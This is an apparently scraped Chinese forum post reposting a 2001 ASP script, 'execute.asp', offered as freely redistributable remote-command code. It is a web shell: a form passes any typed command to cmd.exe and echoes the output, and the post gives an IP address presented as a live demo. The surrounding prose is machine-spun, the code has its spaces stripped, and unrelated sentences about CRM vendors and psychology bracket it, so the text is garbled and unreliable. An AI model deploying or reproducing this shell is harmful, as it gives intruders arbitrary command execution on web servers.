|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
当然了,现在国内CRM厂商的产品与其说是CRM,但从至少从我的角度分析上来看,充其量只是一个大型的进销存而已了,了解尚浅,不够胆详评,这里只提技术问题实行能够实行体系命令的ASP原码放送
whoamI
日期:2001.2.1
比来正在写一个远程服务器办理的东东(自创了ASE的部分代码、增添了远程
实行命令、上传、服务等功效。),失掉了阿新、ADAM、辰儿、ghost_happy、
crazybird等良多网友的匡助,让我很冲动,以是我盘算写好了今后,全体原代码
发布,能够自在修正和分布。你所要做的只是上传程序到一个撑持ASP的服务器。
值得注重的是,程序运转必需有FileSystemObject撑持。以下是远程实行命令的
原代码。copy上去另存为execute.asp.
演示地点:http://210.160.4.24/scripts/execute.asp
一台日本的烂机,以是中文会呈现乱码!
<html>
<head>
<metahttp-equiv="Content-Language"content="zh-cn">
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<metaname="GENERATOR"content="MicrosoftFrontPage4.0">
<metaname="ProgId"content="FrontPage.Editor.Document">
<title>实行命令</title>
<style>
<!--
table,body{font-family:宋体;font-size:9pt}
a{font-family:宋体;font-size:9pt;color:rgb(0,32,64);
text-decoration:none}
a:hover{font-family:宋体;color:rgb(255,0,0);text-decoration:none
}
a:visited{color:rgb(128,0,0)}
-->
</style>
</head>
<bodybgcolor="#000000"text="#C0C0C0">
<formmethod="POST"action="execute.asp">
<palign="left">输出要实行的命令:<inputtype="text"name="ml"
size="20"value="dirc:"style="background-color:#C0C0C0;color:
#000000;border-style:solid;border-width:1">
<inputtype="submit"value="实行"name="B1"style="background-color:
#C0C0C0;color:#000000;border:1groove#C0C0C0"></p>
</form>
<%
ml=request.form("ml")
cmd="c:winntsystem32cmd.exe/c"&ml&">c:whoamI.txt"修正
whoamI.txt路径到一个有写权限的目次
SetWShShell=Server.CreateObject("WScript.Shell")
RetCode=WShShell.Run(cmd,1,True)
ifRetCode=0Then
Response.writeml&" "
Response.write"命令乐成实行!"&"<br><br>"
else
Response.write"命令实行失利!权限不敷大概该程序没法在DOS形态下运转
!"&"<br><br>"
endif
response.writecmd
functionhtmlencode(str)
dimresult
diml
ifisNULL(str)then
htmlencode=""
exitfunction
endif
l=len(str)
result=""
dimi
fori=1tol
selectcasemid(str,i,1)
case"<"
result=result+"<"
case">"
result=result+">"
casechr(34)
result=result+"""
case"&"
result=result+"&"
caseelse
result=result+mid(str,i,1)
endselect
next
htmlencode=result
endfunction
Setfs=CreateObject("Scripting.FileSystemObject")
Setthisfile=fs.OpenTextFile("c:/whoamI.txt",1,False)读文件,别忘
了修正路径.
counter=0
dowhilenotthisfile.atendofstream
counter=counter+1
thisline=htmlencode(thisfile.readline)
response.writethisline&"<br>"
loop
thisfile.Close
setfs=nothing
%>
</body>
</html&</p>想法是和程序员的想法不一样的.至于为什么.大家去想一想.跟心理学有关的 |
|